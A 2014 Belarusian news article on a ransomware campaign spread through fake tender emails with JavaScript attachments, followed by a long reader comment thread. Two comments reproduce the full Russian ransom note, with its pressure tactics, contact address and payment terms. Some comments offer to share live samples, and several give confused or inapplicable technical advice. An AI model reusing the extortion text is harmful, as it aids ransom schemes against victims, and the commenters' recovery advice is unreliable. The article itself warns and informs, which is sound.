Злоумышленники шифруют файлы на компьютерах белорусов и требуют выкуп

 
33 827
204
25 июня 2014 в 12:38
Автор: Ян Альшевский. Фото: toptenreviews.com

Вирусы-вымогатели не являются большой редкостью: наиболее известны те, которые демонстрируют «заглушку» на весь экран компьютера и от имени МВД обвиняют пользователя в нарушении авторских прав и хранении порнографических материалов запрещенного характера. Для решения проблемы предлагается уплатить «штраф», после чего блокировка снимается.

Как рассказали Onliner.by в антивирусной компании «ВирусБлокАда», белорусских пользователей может ожидать новая волна подобных вредоносных программ. «В организацию приходит якобы тендерное предложение: организация, именем которой подписано письмо, существует, адрес, с которого отправлено письмо, также существует и „светился“ в интернете в связке с этой организацией (в том числе белорусской). Но вместо реального телефона он подписан московским номером», — пояснил Юрий Резников, руководитель группы по работе с клиентами. Он отметил, что среди пострадавших есть как государственные, так и негосударственные организации.

По его словам, после открытия файла запускается скрипт, который выкачивает и запускает вредоносную программу. Ее особенность в том, что она использует для работы легальную утилиту GNUPG для шифрования, а длина ключа такова, что взломать подбором шифр невозможно.

«После запуска вредоноса происходит шифрование документов на компьютере (и на открытых сетевых дисках, если такие подключены). Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег», — рассказал Юрий Резников.

Он подчеркнул, что пользователи становятся жертвами по своей невнимательности: «Не стоит открывать подозрительные файлы из вложений, если они никак не подходят под описание тендерного предложения (например, архив с файлом JavaScript (.js) во вложении)».

«Пострадавших уже достаточно много, только вчера к нам обратились из двух организаций. Сейчас мы пытаемся провести расследование инцидента. Может быть, удастся найти способ восстановления данных пользователей. Но пока что ситуация не очень радостная», —  резюмировал специалист.

Автор: Ян Альшевский. Фото: toptenreviews.com
Чтобы оставить свое мнение, необходимо войти или зарегистрироваться
ОБСУЖДЕНИЕ
25.06.2014 в 12:39
от имени МВД обвиняют пользователя

Отдел "К" деньгу зашибает?
xD
25.06.2014 в 12:40
Пару раз ловил такого зловреда, один раз сам, а воторой раз товарищу) обновил флэш плэер) Обычно просто блочит комп и браузеры. Если стоит популярный антивирь, желательно произведенный в регионе проживания потребителя, то проблем не должно быть с вирусами.
25.06.2014 в 12:40
Без IT-лоха - жизнь хакера плоха
25.06.2014 в 12:41
очередной лохотрон
25.06.2014 в 12:42
от имени МВД обвиняют пользователя

Отдел "К" работает?
"777Алекс":

нет конечно, они явно помогают доделывать музей ВОВ
25.06.2014 в 12:42
Бэкапы рулят!
25.06.2014 в 12:42
При наличии знании эта блокировка снимается на раз два и панику разводить не стоит
Но надо быть внимательным и не открывать всё подряд
25.06.2014 в 12:43
Меньше за компом сидите!
25.06.2014 в 12:44
windows/drivers/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема с большинством таких програм, полученых в порнухе или соц. сетях будет устранена..
25.06.2014 в 12:44
Хорошо то как на MAC OS работать и не париться такими проблемами...
25.06.2014 в 12:46
Меньше нужно по порносайтам лазить!
25.06.2014 в 12:48
windows/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема устранена.
"IlyaSiliwonik":

Windows\System32\Drivers\etc\hosts ?
25.06.2014 в 12:50
При наличии знании эта блокировка снимается на раз два и панику разводить не стоит
Но надо быть внимательным и не открывать всё подряд
"Stranik":

чукча не читатель, чукча - писатель
25.06.2014 в 12:50
windows/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема устранена.
"IlyaSiliwonik":

Windows\System32\Drivers\etc\hosts ?
"horsten":

верно. у кого-то так.
25.06.2014 в 12:50
Какие хосты, какие заглушки? Вы, дыбилы, читать не умеете? Вирус шифрует файло локально и на шарах. Если еще не делаете бэкапы, то самое время начать. Зашифруют вам базу 1Сочную, что Вы делать будете? Заявление писать по собственному?
25.06.2014 в 12:51
У нас многие в мобилах не разбираются,а комп для них всего лишь игрушка,никакой безопасности и куча вирусов,червей,почему же не воспользоваться теми, кто не разбирается в системе?Проще заплатить,чем ломать себе голову.
25.06.2014 в 12:56
Отдам деньги только если "ХОУМ видео" зашифруют, ну или WOT.
25.06.2014 в 12:56
Сотворил зло--получил благо.
25.06.2014 в 12:57
С белоруса много не возьмешь )) а нет средств защиты у тех людей кому на файлы вообще плевать ))
25.06.2014 в 12:57
Какие хосты, какие заглушки? Вы, дыбилы, читать не умеете? Вирус шифрует файло локально и на шарах. Если еще не делаете бэкапы, то самое время начать. Зашифруют вам базу 1Сочную, что Вы делать будете? Заявление писать по собственному?
"karlson_by":

И базу зашифровать могут? Меня ж уроют за нее... Хотя нет, никакие подозрительные файлы не открываю)
25.06.2014 в 12:58
Меньше нужно по порносайтам лазить!
"Dark_Side_22":

На порносайтах по статистике вирусов меньше чем где бы то ни было!
25.06.2014 в 12:59
Меньше нужно по порносайтам лазить!
"Dark_Side_22":

На порносайтах по статистике вирусов меньше чем где бы то ни было!
"Annigilator1":

Спс, мне сразу полегчало!)
25.06.2014 в 13:00
балэбалу им а не выкуп
25.06.2014 в 13:01
При наличии знании эта блокировка снимается на раз два и панику разводить не стоит
"Stranik":

с помощью домашнего суперкомпьютера, судя по всему, расшифровывать будете...
25.06.2014 в 13:03
Да уж. Вирус. Прям уж ВИРУСИЩЕ!!!
Чую, скоро появится вирус в виде текстового файла, в котором будут инструкции, что надо сделать пользователю, чтобы грохнуть у себя информацию. Среднестатистический пользователь уже достаточно отупел, чтоб не заподозрить неладное.
25.06.2014 в 13:03
IlyaSiliwonik,
а что чистить в блокноте, смысл есть хоть ?
25.06.2014 в 13:04
Хорошо то как на MAC OS работать и не париться такими проблемами...
"Теро":

На макоси можно работать? Офигеть просто :)
25.06.2014 в 13:04
хранении порнографических материалов запрещенного характера

Уф, хорошо что у меня порнуха разрешенного характера.
25.06.2014 в 13:08
хранении порнографических материалов запрещенного характера

Уф, хорошо что у меня порнуха разрешенного характера.
"EMULGATOR-LECITIN":

не поверите
25.06.2014 в 13:08
как придумают заголовок... как будто в мире прям охота на белорусов. файлы шифруют, в польше штрафуют....
25.06.2014 в 13:09
хранении порнографических материалов запрещенного характера

Уф, хорошо что у меня порнуха разрешенного характера.
"EMULGATOR-LECITIN":

не поверите
"collapse":

А без котэ тоже можно хранить?
Уже давно такими вирусами пугают. Уже и до организаций добрались.
25.06.2014 в 13:25
нужно думать, куда жмешь, а то потом верещат, мол вы не защитили наши данные
25.06.2014 в 13:27
На данный момент сижу, тоже пытаюсь хоть что то решить :( Поймали аналогичным методом...Все данные за 5 лет работы зашифрованы.... Печаль. =)
25.06.2014 в 13:27
На данный момент сижу, тоже пытаюсь хоть что то решить :( Поймали аналогичным методом...
"Forrd":

Серьезно?
25.06.2014 в 13:28
При наличии знании эта блокировка снимается на раз два и панику разводить не стоит
Но надо быть внимательным и не открывать всё подряд
"Stranik":

Для начала попробуйте хотя бы пароль админа в винде расшифровать по хэшу.
25.06.2014 в 13:31
На данный момент сижу, тоже пытаюсь хоть что то решить :( Поймали аналогичным методом...Все данные за 5 лет работы зашифрованы.... Печаль. =)
"Forrd":

Победишь - поделись опытом, пожалуйста. По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
25.06.2014 в 13:40
Меньше за компом сидите!
"Наргх":

Сказал человек на 112 месте в топе комментаторов!
25.06.2014 в 13:40
Полечка, а что по-Вашему такое база данных? Те же файлы. Судя по Вашим словам, Вы в организации одна имеете доступ на rw к расшаренной базе? А если тетя главбух решит посмотреть письмо с тендерным предложением. Делайте рассылки, сисадмины и бэкапьтесь.
25.06.2014 в 13:47
Беда. Ипользуйте linux ребята и не будет у вас никаких проблем с потерей данных за 5 лет работы. Уже один такой прецедент заставил бы меня перейти на более безопасную ОС.
25.06.2014 в 13:48
Полечка, а что по-Вашему такое база данных? Те же файлы. Судя по Вашим словам, Вы в организации одна имеете доступ на rw к расшаренной базе? А если тетя главбух решит посмотреть письмо с тендерным предложением. Делайте рассылки, сисадмины и бэкапьтесь.
"karlson_by":

Спс. Пока не я одна, но подумывают полностью передать.
25.06.2014 в 13:49
Чую, скоро появится вирус в виде текстового файла, в котором будут инструкции, что надо сделать пользователю, чтобы грохнуть у себя информацию. Среднестатистический пользователь уже достаточно отупел, чтоб не заподозрить неладное.
"ТМД2":

Вирус, написанный гуманитарием! Для гуманитариев...
25.06.2014 в 13:50
Поставил в модеме фаерфол и защиту от хакеров, на компе защитник виндовс которы читает с флешек и не парюсь с вирусами. Все у кого вирусы руки кривые!
25.06.2014 в 13:54
Starkiller662, чувак, ты вообще понимаешь, о чем пишешь?
25.06.2014 в 13:54
Тоже мне новость!
25.06.2014 в 13:56
Starkiller662, чувак, ты вообще понимаешь, о чем пишешь?
"karlson_by":

не трогай его, он виндофс пользователь
25.06.2014 в 13:57
Хорошо то как на MAC OS работать и не париться такими проблемами...
"Теро":

На макоси можно работать? Офигеть просто :)
"ТМД2":

Представляешь себе - можно, даже твоя любимая косынка с сапером есть :)
25.06.2014 в 13:57
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
25.06.2014 в 13:58
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
25.06.2014 в 14:00
короче играем в пасьянс и почту не читаем.
25.06.2014 в 14:05
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":

Если бы он хранился в системе, то в чём проблема расшифровать? Или в компании «ВирусБлокАда» не могут элементарно взять ключ и расшифровать? Т.е. если он где-то в системе (ключ), то путь к нему должен быть в коде, если нет, то шифровка получается односторонняя, т.е. расшифровать не получится.
25.06.2014 в 14:12
Беда. Ипользуйте linux ребята и не будет у вас никаких проблем с потерей данных за 5 лет работы. Уже один такой прецедент заставил бы меня перейти на более безопасную ОС.
"jane_red":



Все файлы были ВРЕМЕННО ЗАБЛОКИРОВАНЫ с помощью алгоритма RSA-1024

1. Это инструкция, которая поможет разобраться с Вашей проблемой. Её решить вполне возможно, не переживайте.

2. Для решения данной проблемы нужно объединить наши общие ресурсы.
Ваши ресурсы:
- e-mail и доверие
- электронная валюта "за урок"
Наши ресурсы:
- Возможность разблокировать Ваш ключ (дешифровщик уже у Вас есть - DECODE.exe)
- Предоставим гарантии - после оплаты ключ будет передан, согласно договоренности
- Консультации после оплаты

3. Мы не из тех, кто шифруют данные, получают средства и затем пропадают.
В данном случае Вы и вправду имеете возможность разблокировать файлы.
Только есть небольшое временное ограничение (срок годности ключа не вечный)
Откладывать вопрос "на потом" также не вариант, плюс верить в чудеса не стоит.

4. У Вас есть два варианта:
а) Форматировать диски и вернуть 0% файлов - неразумно
б) Заплатить за свою невнимательность, вернуть все файлы и получить консультации - вполне правильно

5. Итак, попробуйте запустите Ваш дешифратор из архива. Вам напишет, что ключ не найден. Вот он Вам и нужен.
Если считаете, что дешифратор есть очередным вирусом, попросите любого сис.админа проанализировать его простую структуру

6. Тех.справка:
Ваш случай - ассиметричное шифрование RSA-1024 (используется в военной сфере. Взломать невозможно)
При шифровании, в разные места компьютера был скопирован специальный ID-файл 'KEY.PRIVATE'. Не потеряйте его (!!!)
Для каждого компьютера ID-файл создается новый. Он уникальный и в нём содержится код на дешифровку. Он нам и нужен.


7. Итак, наши с Вами шаги:
7.1. С нами связь держать можно только по электронной почте paycrypt@gmail.com
7.2. В начале Вам необходимо получить гарантитого, что мы можем расшифровать файлы (бывают редкие случаи, когда уже не можем)
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки
- приблизительное колл-во зашифрованных файлов / компьютеров
7.3. В течение 1-го часа Вы получите гарантию и стоимость на Ваш ключ
7.4. Далее производится оплата, минимальная стоимость от 120 евро.
7.5. Мы отправляем Вам ключ, Вы его кладете в одну папку с дешифратором (DECODE.exe) и запускаете дешифратор
7.6. При запуске дешифратора производится скрытая дешифровка данных. Процесс запускать более 1-го раза нельзя.
7.7. Процесс дешифрования может занимать до 6-ти часов в скрытом режиме. По окончании процесса компьютер перезагрузится.

9. Советы:
9.1. После приобретения ключа, сделайте копию всех важных зашифрованных файлов на внешние носители.
9.2. В процессе дешифрования желательно не трогать компьютер, (!) ДВА раза запускать с ключем дешифратор не нужно.
9.3. Если думаете, что вместо дешифратора Вы получите очередной вирус, тогда поставьте вирт.систему и там проведите дешифровку.
9.2. Если какие-то файлы не будут окончательно расшифрованы, мы дорасшифруем вручную (передача файлов по почте)
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
DATE CRYPTED: 24.06.2014
25.06.2014 в 14:16
Ребята пришло письмо в архиве о тендере, бухгалтер чуть не открыла.

А секретарь открыла, думали что все.....

Касперский сразу защитил.
25.06.2014 в 14:19
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":

Если бы он хранился в системе, то в чём проблема расшифровать? Или в компании «ВирусБлокАда» не могут элементарно взять ключ и расшифровать? Т.е. если он где-то в системе (ключ), то путь к нему должен быть в коде, если нет, то шифровка получается односторонняя, т.е. расшифровать не получится.
"Atllantis":

Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":


Тот экземпляр, с которым меня вчера попросили поковыряться, использует асимметричное RSA-шифрование. После отправки пары сгенерированных ключей (открытого и закрытого) создателю вируса, один из пары удаляется через sdelete (Secure Delete) - восстановить и стравить ихнему декриптору уже нельзя. Далее файлы шифруются оставшимся закрытым ключом. Таким образом, расшифровать пользователь уже не может. Но вот создатель расшифровать действительно может: у него есть второй ключ от пары, нужный для расшифровки. Короче, всё печально. Господа, настраивайте бэкапы...
25.06.2014 в 14:20
Ребята пришло письмо в архиве о тендере, бухгалтер чуть не открыла.

А секретарь открыла, думали что все.....

Касперский сразу защитил.
"kolya_f":

Можешь залить куда-нибудь (на файлообменник) и скинуть мне в ЛС?
Буду очень благодарен.
25.06.2014 в 14:22
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":

Если бы он хранился в системе, то в чём проблема расшифровать? Или в компании «ВирусБлокАда» не могут элементарно взять ключ и расшифровать? Т.е. если он где-то в системе (ключ), то путь к нему должен быть в коде, если нет, то шифровка получается односторонняя, т.е. расшифровать не получится.
"Atllantis":

Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":


Тот экземпляр, с которым меня вчера попросили поковыряться, использует асимметричное RSA-шифрование. После отправки пары сгенерированных ключей (открытого и закрытого) создателю вируса, один из пары удаляется через sdelete (Secure Delete) - восстановить и стравить ихнему декриптору уже нельзя. Далее файлы шифруются оставшимся закрытым ключом. Таким образом, расшифровать пользователь уже не может. Но вот создатель расшифровать действительно может: у него есть второй ключ от пары, нужный для расшифровки. Короче, всё печально. Господа, настраивайте бэкапы...
"SoFx00":

Ключ отправляется зашифрованным соединением?
25.06.2014 в 14:25
На данный момент сижу, тоже пытаюсь хоть что то решить :( Поймали аналогичным методом...Все данные за 5 лет работы зашифрованы.... Печаль. =)
"Forrd":

Победишь - поделись опытом, пожалуйста. По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":


Да да, в системе на удаленном сервере. При шифровании используется public key с удаленного сервера, которым можно только шифровать, либо он уже зашит в сам вирь, а вот часть ключа которой можно расшифровать (private key) - лежит либо на серваке, либо у этих ребят на компе которые вирус подкинули и без него - фиг что сделаешь. Так что, удачи в поисках :)
25.06.2014 в 14:29
Пройденный этап, работал в мск на it оутсорсе. Там конторы шифруются каждый месяц. Спасение только одно - это бекапы. Антивирусы их не ловят вобще. Приходит сообщение на мыло типа "здрасте, вот вам праздничная открытка" и прикрепленный запароленый архив. Все к чему был доступ у пользователя попадает под шифрование. Просят вымогатели обычно 10т росс рублей. Кстати, с интервалом через примерно пол года выходят дешифраторы от Каспера и AVZ на определенную версию шифровльщика. Так что не спешите удалять зашифрованные данные. Лично знаком с начальником отдела одного из груп каспера. Коллеги не мучайтесь даже не пытайтесь расшифровать.
25.06.2014 в 14:29
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":

Если бы он хранился в системе, то в чём проблема расшифровать? Или в компании «ВирусБлокАда» не могут элементарно взять ключ и расшифровать? Т.е. если он где-то в системе (ключ), то путь к нему должен быть в коде, если нет, то шифровка получается односторонняя, т.е. расшифровать не получится.
"Atllantis":

Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":


Тот экземпляр, с которым меня вчера попросили поковыряться, использует асимметричное RSA-шифрование. После отправки пары сгенерированных ключей (открытого и закрытого) создателю вируса, один из пары удаляется через sdelete (Secure Delete) - восстановить и стравить ихнему декриптору уже нельзя. Далее файлы шифруются оставшимся закрытым ключом. Таким образом, расшифровать пользователь уже не может. Но вот создатель расшифровать действительно может: у него есть второй ключ от пары, нужный для расшифровки. Короче, всё печально. Господа, настраивайте бэкапы...
"SoFx00":

Я что-то сомневаюсь, что все файлы реально шифруются, слишком это долгий и ресурсоемкий процесс.
25.06.2014 в 14:29
windows/drivers/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема с большинством таких програм, полученых в порнухе или соц. сетях будет устранена..
"IlyaSiliwonik":

C:\Windows\System32\drivers\etc если уж на то пошло. но если вирус после блокировки системы дал вам спокойно запустить хотя бы explorer, то это не вирус, а побрекушка.
в случае с описываемым зловредом перехватывается все, вплоть до хоткеев.
25.06.2014 в 14:30
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
"Atllantis":

Если интересно, сброшу само письмо, но оно *.txt. Ничего интересного. Сам вирус уже удалил. У нас девочка открыла такое тендерное приглашение с электронки. Позвала меня, когда увидела, что у всех файлов (doc, xls, pdf, zip) изменилось расширение и выскочила надпись с предложением оплатить. KIS предательски при этом молчал. Я сразу обрубил комп от инета, вручную удалил несколько подозрительных файлов, сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом. Все показало "чисто". Все действия заняли 5 минут. Сча вроде все работает в штатном режиме.
25.06.2014 в 14:31
"«После запуска вредоноса происходит шифрование документов на компьютере (и на открытых сетевых дисках, если такие подключены). Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег», — рассказал Юрий Резников."
реинкарнация знаменитой Neshta?
"Он подчеркнул, что пользователи становятся жертвами по своей невнимательности: «Не стоит открывать подозрительные файлы из вложений, если они никак не подходят под описание тендерного предложения (например, архив с файлом JavaScript (.js) во вложении)»."
нужно просто установить нормальный антивирус, а не "скачать с торрентов, потому что друг посоветовал".
25.06.2014 в 14:32
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
"Atllantis":

Если интересно, сброшу само письмо, но оно *.txt. Ничего интересного. Сам вирус уже удалил. У нас девочка открыла такое тендерное приглашение с электронки. Позвала меня, когда увидела, что у всех файлов (doc, xls, pdf, zip) изменилось расширение и выскочила надпись с предложением оплатить. KIS предательски при этом молчал. Я сразу обрубил комп от инета, вручную удалил несколько подозрительных файлов, сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом. Все показало "чисто". Все действия заняли 5 минут. Сча вроде все работает в штатном режиме.
"Mercury_78":

Не, текст письма мне не интересен. :(
25.06.2014 в 14:32
Stranik, вы не сталкивались с таким - когда вылечите (расшифруете на раз) - тогда и приходите ))). 1024 ключ RSA - это не для доморощенного специалиста, который винду за 150 ворованную накатывает
25.06.2014 в 14:35

Если интересно, сброшу само письмо, но оно *.txt. Ничего интересного. Сам вирус уже удалил.
"Mercury_78":

посмотрел, в корзине почты то письмо с вирусом еще висит. Если кому интересно глянуть код - пожалуйста, свистите.

p.s. Лавочка закрыта... вирус удалил окончательно
25.06.2014 в 14:36
Меньше нужно по порносайтам лазить!
"Dark_Side_22":

На порносайтах по статистике вирусов меньше чем где бы то ни было!
"Annigilator1":

можно посмотреть статистику, на которую вы ссылаетесь? желательно от более-менее авторитетного источника, а не от соседа сверху/снизу.
25.06.2014 в 14:37

Если интересно, сброшу само письмо, но оно *.txt. Ничего интересного. Сам вирус уже удалил.
"Mercury_78":

посмотрел, в корзине почты то письмо с вирусом еще висит. Если кому интересно глянуть код - пожалуйста, свистите.
"Mercury_78":

Тогда, я свищу! :)
25.06.2014 в 14:40
Привет всем умникам и умницам. Которые дают ценные рекомендации ,каким образом избежать данного конфликта: В Ваш адрес приходит письмо от контрагента,в письмо вложен файл. Примите участие в тендере , распаковываете, вся база на компе падает.Ни одного документа нет.Через 20-30 секунд всплывает "письмо счастья" вот его текст. Сам вчера получил: Все файлы были ВРЕМЕННО ЗАБЛОКИРОВАНЫ с помощью алгоритма RSA-1024

1. Это инструкция, которая поможет разобраться с Вашей проблемой. Её решить вполне возможно, не переживайте.

2. Для решения данной проблемы нужно объединить наши общие ресурсы.
Ваши ресурсы:
- e-mail и доверие
- электронная валюта "за урок"
Наши ресурсы:
- Возможность разблокировать Ваш ключ (дешифровщик уже у Вас есть - DECODE.exe)
- Предоставим гарантии - после оплаты ключ будет передан, согласно договоренности
- Консультации после оплаты

3. Мы не из тех, кто шифруют данные, получают средства и затем пропадают.
В данном случае Вы и вправду имеете возможность разблокировать файлы.
Только есть небольшое временное ограничение (срок годности ключа не вечный)
Откладывать вопрос "на потом" также не вариант, плюс верить в чудеса не стоит.

4. У Вас есть два варианта:
а) Форматировать диски и вернуть 0% файлов - неразумно
б) Заплатить за свою невнимательность, вернуть все файлы и получить консультации - вполне правильно

5. Итак, попробуйте запустите Ваш дешифратор из архива. Вам напишет, что ключ не найден. Вот он Вам и нужен.
Если считаете, что дешифратор есть очередным вирусом, попросите любого сис.админа проанализировать его простую структуру

6. Тех.справка:
Ваш случай - ассиметричное шифрование RSA-1024 (используется в военной сфере. Взломать невозможно)
При шифровании, в разные места компьютера был скопирован специальный ID-файл 'KEY.PRIVATE'. Не потеряйте его (!!!)
Для каждого компьютера ID-файл создается новый. Он уникальный и в нём содержится код на дешифровку. Он нам и нужен.


7. Итак, наши с Вами шаги:
7.1. С нами связь держать можно только по электронной почте paycrypt@gmail.com
7.2. В начале Вам необходимо получить гарантитого, что мы можем расшифровать файлы (бывают редкие случаи, когда уже не можем)
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки
- приблизительное колл-во зашифрованных файлов / компьютеров

7.3. В течение 1-го часа Вы получите гарантию и стоимость на Ваш ключ
7.4. Далее производится оплата, минимальная стоимость от 120 евро.
7.5. Мы отправляем Вам ключ, Вы его кладете в одну папку с дешифратором (DECODE.exe) и запускаете дешифратор
7.6. При запуске дешифратора производится скрытая дешифровка данных. Процесс запускать более 1-го раза нельзя.
7.7. Процесс дешифрования может занимать до 6-ти часов в скрытом режиме. По окончании процесса компьютер перезагрузится.

9. Советы:
9.1. После приобретения ключа, сделайте копию всех важных зашифрованных файлов на внешние носители.
9.2. В процессе дешифрования желательно не трогать компьютер, (!) ДВА раза запускать с ключем дешифратор не нужно.
9.3. Если думаете, что вместо дешифратора Вы получите очередной вирус, тогда поставьте вирт.систему и там проведите дешифровку.
9.2. Если какие-то файлы не будут окончательно расшифрованы, мы дорасшифруем вручную (передача файлов по почте)
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
25.06.2014 в 14:42
Беда. Ипользуйте linux ребята и не будет у вас никаких проблем с потерей данных за 5 лет работы. Уже один такой прецедент заставил бы меня перейти на более безопасную ОС.
"jane_red":

ВСЕ компании в Беларуси и почти все в мире используют продукцию Майкрософт.
А вы предлагаете перейти на Линукс и постоянно возиться с экспортом/импортом разных больших таблиц, текстов и т.п.? ))
25.06.2014 в 14:43
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
"Atllantis":

вы думаете автор этого вируса настолько порядочный, что будет заморачиваться расшифровкой файлов обратно, после того, как вы забашляете ему бабла? наивный простак...
зачем хакеру оставлять лазейку, по которой его будет так просто вычислить?
25.06.2014 в 14:46
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
"Atllantis":

вы думаете автор этого вируса настолько порядочный, что будет заморачиваться расшифровкой файлов обратно, после того, как вы забашляете ему бабла? наивный простак...
зачем хакеру оставлять лазейку, по которой его будет так просто вычислить?
"_TNT_":

кстати в 50% после оплаты людям приходили ключи для дешифровки.
25.06.2014 в 14:50
Также появляется письмо, в котором пользователям предлагается обменять ключ для расшифровки файлов (сгенерированный случайным образом) на определенную сумму денег

Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
Где можно взглянуть на такое письмо? :)
Хотелось бы посмотреть на код.
"Atllantis":

вы думаете автор этого вируса настолько порядочный, что будет заморачиваться расшифровкой файлов обратно, после того, как вы забашляете ему бабла? наивный простак...
зачем хакеру оставлять лазейку, по которой его будет так просто вычислить?
"_TNT_":

Вы похоже, в школе только читать научились, а понимать прочитанное — нет.
Где вы увидели в моём комментарии, что после оплаты фалы будут обратно расшифрованы?
25.06.2014 в 14:56
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
Памятка от поклонника Apple.
25.06.2014 в 14:57
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
25.06.2014 в 14:58
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
"Handrey":

А что Вы им такое сделали, что выслали сами?) Бесплатно выслали?
25.06.2014 в 15:00
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
"guevarache":

в какую сторону копать уже понятно.
у какого-то хакера-пользователя MacOS баттхертит по поводу непопулярности его ОС.
25.06.2014 в 15:02
Вы похоже, в школе только читать научились, а понимать прочитанное — нет.
Где вы увидели в моём комментарии, что после оплаты фалы будут обратно расшифрованы?
"Atllantis":

я выделю для вас жирным, ваши же слова. кто знает, вдруг поможет.
Если он генерируется случайным образом, то каким образом его можно получить? Т.е. зашифровав файлы, уже, хоть плати, хоть не плати, их не расшифровать.
"Atllantis":

к моменту написания того комментария я еще не видел текста письма. сейчас схема ясна, хакер оказался более наглым, чем мне казалось)
25.06.2014 в 15:04
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
"Handrey":

А что Вы им такое сделали, что выслали сами?) Бесплатно выслали?
"Полечка":

Вы не поверите, но да, абсолютно без платно. Я им просто в обратный адрес написал, что ребята вы конечно молодцы, но это не справедливо. пожалуйста верните мне всё как было)))) Не серьёзно. и они выслали дешефратор. Я включил его на ночь, а с уьра всё было как новенькое)
25.06.2014 в 15:04
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
"guevarache":

в какую сторону копать уже понятно.
у какого-то хакера-пользователя MacOS баттхертит по поводу непопулярности его ОС.
"_TNT_":

Ну или противники этой самой Mac OS. Здесь два варианта.
25.06.2014 в 15:07
Вы не поверите, но да, абсолютно без платно. Я им просто в обратный адрес написал, что ребята вы конечно молодцы, но это не справедливо. пожалуйста верните мне всё как было)))) Не серьёзно. и они выслали дешефратор. Я включил его на ночь, а с уьра всё было как новенькое)
"Handrey":

и прислали "дефишратор", который за ночь забекдорил всю личную инфу к злоумышленнику... деньги с пластиковых карточек еще не пропали?
25.06.2014 в 15:08
Можно js посмотреть. В личку, пожалуйста.
25.06.2014 в 15:09
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
"Handrey":

А что Вы им такое сделали, что выслали сами?) Бесплатно выслали?
"Полечка":

Вы не поверите, но да, абсолютно без платно. Я им просто в обратный адрес написал, что ребята вы конечно молодцы, но это не справедливо. пожалуйста верните мне всё как было)))) Не серьёзно. и они выслали дешефратор. Я включил его на ночь, а с уьра всё было как новенькое)
"Handrey":

